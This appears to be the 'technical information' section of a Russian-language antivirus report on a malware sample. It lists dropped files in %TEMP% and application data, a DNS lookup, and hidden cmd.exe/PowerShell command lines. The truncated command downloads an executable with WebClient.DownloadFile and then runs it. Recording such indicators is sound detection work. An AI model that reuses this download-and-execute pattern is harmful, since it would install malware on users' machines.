Техническая информация
- $itzstwfs как %temp%\wfb3.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Tbmccskz4([String] $Itzstwfs){(New-Object System.Net.WebClient).DownloadFile($Itzstwfs,''%TEMP%\wfb3.exe'');Start-Process ''%TEMP%\wfb3.exe'';}try{Tbmccskz...
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\pmktjfukubya.bat
- DNS ASK df###dfgd.png
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Tbmccskz4([String] $Itzstwfs){(New-Object System.Net.WebClient).DownloadFile($Itzstwfs,''%TEMP%\wfb3.exe'');Start-Process ''%TEMP%\wfb3.exe'';}try{Tbmccskz...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\pmktjfukubya.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\pmktjfukubya.bat" "